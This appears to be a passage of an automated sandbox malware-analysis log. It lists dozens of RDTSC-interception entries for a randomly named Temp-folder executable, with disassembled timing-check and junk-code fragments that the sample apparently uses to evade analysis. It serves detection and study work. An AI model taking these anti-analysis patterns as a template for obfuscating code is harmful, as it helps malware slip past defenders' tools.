Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1087EFB second address: 1087EFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 108AB2A second address: 108AB2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 108AB2F second address: 108AB39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F3FE11BFDC6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 108AB39 second address: 108ABB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c call 00007F3FE0C24E68h 0x00000011 mov edi, 29FB8F21h 0x00000016 pop edi 0x00000017 push 00000000h 0x00000019 mov ebx, dword ptr [ebp+122DB9D6h] 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push esi 0x00000024 call 00007F3FE0C24E58h 0x00000029 pop esi 0x0000002a mov dword ptr [esp+04h], esi 0x0000002e add dword ptr [esp+04h], 00000015h 0x00000036 inc esi 0x00000037 push esi 0x00000038 ret 0x00000039 pop esi 0x0000003a ret 0x0000003b xor bx, 2D25h 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 jmp 00007F3FE0C24E65h 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 108ABB5 second address: 108ABBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 108BD35 second address: 108BD78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 or dword ptr [ebp+122D1AA1h], ebx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F3FE0C24E58h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b push 00000000h 0x0000002d mov ebx, dword ptr [ebp+122D23DBh] 0x00000033 push eax 0x00000034 pushad 0x00000035 push ebx 0x00000036 push eax 0x00000037 pop eax 0x00000038 pop ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b ja 00007F3FE0C24E56h 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 108BD78 second address: 108BD7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 108CD66 second address: 108CD83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F3FE0C24E5Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 108DEA7 second address: 108DEAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 108DEAB second address: 108DF28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, dword ptr [ebp+122D191Ch] 0x00000013 push 00000000h 0x00000015 js 00007F3FE0C24E6Fh 0x0000001b pushad 0x0000001c mov eax, ebx 0x0000001e jmp 00007F3FE0C24E65h 0x00000023 popad 0x00000024 push 00000000h 0x00000026 jmp 00007F3FE0C24E66h 0x0000002b xchg eax, esi 0x0000002c push esi 0x0000002d push esi 0x0000002e pushad 0x0000002f popad 0x00000030 pop esi 0x00000031 pop esi 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 push edi 0x00000036 jmp 00007F3FE0C24E61h 0x0000003b pop edi 0x0000003c rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 108FE77 second address: 108FF01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3FE11BFDC6h 0x0000000a popad 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F3FE11BFDC8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov ebx, dword ptr [ebp+122D269Ch] 0x0000002d push 00000000h 0x0000002f mov dword ptr [ebp+122D247Bh], ebx 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007F3FE11BFDC8h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 00000016h 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 or ebx, dword ptr [ebp+1245010Bh] 0x00000057 jmp 00007F3FE11BFDD5h 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F3FE11BFDD5h 0x00000064 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 108FF01 second address: 108FF0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F3FE0C24E56h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 108FF0B second address: 108FF0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 108F10B second address: 108F130 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 ja 00007F3FE0C24E56h 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 jg 00007F3FE0C24E5Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 jp 00007F3FE0C24E56h 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1090F8A second address: 1090FE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F3FE11BFDC8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 jc 00007F3FE11BFDCCh 0x0000002a jnp 00007F3FE11BFDC6h 0x00000030 push 00000000h 0x00000032 mov ebx, dword ptr [ebp+12443863h] 0x00000038 push 00000000h 0x0000003a mov ebx, dword ptr [ebp+122D3B7Bh] 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push ecx 0x00000046 pop ecx 0x00000047 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1090FE3 second address: 1090FED instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3FE0C24E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10900EF second address: 10900F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10900F5 second address: 1090101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1091E24 second address: 1091E7E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edi, dword ptr [ebp+1243F00Ah] 0x0000000e push 00000000h 0x00000010 call 00007F3FE11BFDD2h 0x00000015 mov dword ptr [ebp+1246E0DBh], esi 0x0000001b pop ebx 0x0000001c push 00000000h 0x0000001e jnc 00007F3FE11BFDCCh 0x00000024 mov dword ptr [ebp+122D17ADh], edx 0x0000002a jmp 00007F3FE11BFDD8h 0x0000002f xchg eax, esi 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jl 00007F3FE11BFDC6h 0x0000003a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1091E7E second address: 1091E84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1092DFE second address: 1092E9A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3FE11BFDC8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push edi 0x0000000d jmp 00007F3FE11BFDD1h 0x00000012 pop edi 0x00000013 jp 00007F3FE11BFDD6h 0x00000019 popad 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007F3FE11BFDC8h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 0000001Ch 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 ja 00007F3FE11BFDCCh 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebp 0x00000040 call 00007F3FE11BFDC8h 0x00000045 pop ebp 0x00000046 mov dword ptr [esp+04h], ebp 0x0000004a add dword ptr [esp+04h], 0000001Bh 0x00000052 inc ebp 0x00000053 push ebp 0x00000054 ret 0x00000055 pop ebp 0x00000056 ret 0x00000057 push 00000000h 0x00000059 mov edi, dword ptr [ebp+12464EBCh] 0x0000005f xchg eax, esi 0x00000060 push ebx 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1093E31 second address: 1093EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F3FE0C24E61h 0x0000000b pop edx 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F3FE0C24E58h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov ebx, edx 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c and bx, 3916h 0x00000031 pop edi 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007F3FE0C24E58h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 0000001Ch 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e mov di, 65ADh 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1093EA6 second address: 1093EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1094F4C second address: 1094F56 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3FE0C24E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1094F56 second address: 1094F71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3FE11BFDD7h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1095F36 second address: 1095F44 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1095F44 second address: 1095F48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1095F48 second address: 1095F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1095F52 second address: 1095F56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1093F82 second address: 1093F87 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1093F87 second address: 109403D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 jg 00007F3FE11BFDD8h 0x0000000f pop ecx 0x00000010 nop 0x00000011 jno 00007F3FE11BFDD4h 0x00000017 push dword ptr fs:[00000000h] 0x0000001e jmp 00007F3FE11BFDD1h 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a push 00000000h 0x0000002c push esi 0x0000002d call 00007F3FE11BFDC8h 0x00000032 pop esi 0x00000033 mov dword ptr [esp+04h], esi 0x00000037 add dword ptr [esp+04h], 0000001Ah 0x0000003f inc esi 0x00000040 push esi 0x00000041 ret 0x00000042 pop esi 0x00000043 ret 0x00000044 mov dword ptr [ebp+1244273Bh], eax 0x0000004a add dword ptr [ebp+1244A172h], ebx 0x00000050 mov eax, dword ptr [ebp+122D13BDh] 0x00000056 push 00000000h 0x00000058 push ecx 0x00000059 call 00007F3FE11BFDC8h 0x0000005e pop ecx 0x0000005f mov dword ptr [esp+04h], ecx 0x00000063 add dword ptr [esp+04h], 00000017h 0x0000006b inc ecx 0x0000006c push ecx 0x0000006d ret 0x0000006e pop ecx 0x0000006f ret 0x00000070 push FFFFFFFFh 0x00000072 mov edi, 63656D65h 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b push esi 0x0000007c pop esi 0x0000007d rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1092022 second address: 10920D5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3FE0C24E60h 0x00000008 jmp 00007F3FE0C24E5Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 jo 00007F3FE0C24E59h 0x00000018 sbb bl, 0000003Eh 0x0000001b call 00007F3FE0C24E66h 0x00000020 xor di, 5A86h 0x00000025 pop edi 0x00000026 push dword ptr fs:[00000000h] 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007F3FE0C24E58h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 0000001Ah 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 jnp 00007F3FE0C24E5Ch 0x0000004d mov dword ptr fs:[00000000h], esp 0x00000054 mov edi, dword ptr [ebp+12466D92h] 0x0000005a mov bx, si 0x0000005d mov eax, dword ptr [ebp+122D06B9h] 0x00000063 mov ebx, dword ptr [ebp+122D1A59h] 0x00000069 push FFFFFFFFh 0x0000006b mov ebx, dword ptr [ebp+122D29F1h] 0x00000071 nop 0x00000072 pushad 0x00000073 push edi 0x00000074 pushad 0x00000075 popad 0x00000076 pop edi 0x00000077 ja 00007F3FE0C24E5Ch 0x0000007d popad 0x0000007e push eax 0x0000007f push eax 0x00000080 push edx 0x00000081 jno 00007F3FE0C24E58h 0x00000087 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 109FB91 second address: 109FB96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 109FB96 second address: 109FBA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 109FD1E second address: 109FD3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FE11BFDCEh 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3FE11BFDCCh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 109FEB4 second address: 109FEBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 109FEBA second address: 109FEBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10A5473 second address: 10A547C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10A54FA second address: 10A550F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3FE11BFDD1h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10A99F8 second address: 10A9A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FE0C24E63h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10A9A0F second address: 10A9A16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10A9A16 second address: 10A9A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jg 00007F3FE0C24E72h 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F3FE0C24E56h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10A9A2B second address: 10A9A31 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10A9BBA second address: 10A9BBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10A9BBE second address: 10A9BC3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10AA22F second address: 10AA23B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F3FE0C24E56h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10AA23B second address: 10AA23F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10AA23F second address: 10AA269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F3FE0C24E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F3FE0C24E67h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10AA269 second address: 10AA26D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10AA26D second address: 10AA29B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E69h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F3FE0C24E5Ch 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10AA52C second address: 10AA530 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10AA530 second address: 10AA551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F3FE0C24E62h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10AEC8B second address: 10AEC91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10AEC91 second address: 10AECBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F3FE0C24E5Ch 0x00000011 jns 00007F3FE0C24E56h 0x00000017 jp 00007F3FE0C24E58h 0x0000001d push eax 0x0000001e pop eax 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10AEF8C second address: 10AEF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10AEF92 second address: 10AEFAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F3FE0C24E62h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10AF250 second address: 10AF256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10AF256 second address: 10AF25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10AF25C second address: 10AF261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10AF261 second address: 10AF267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
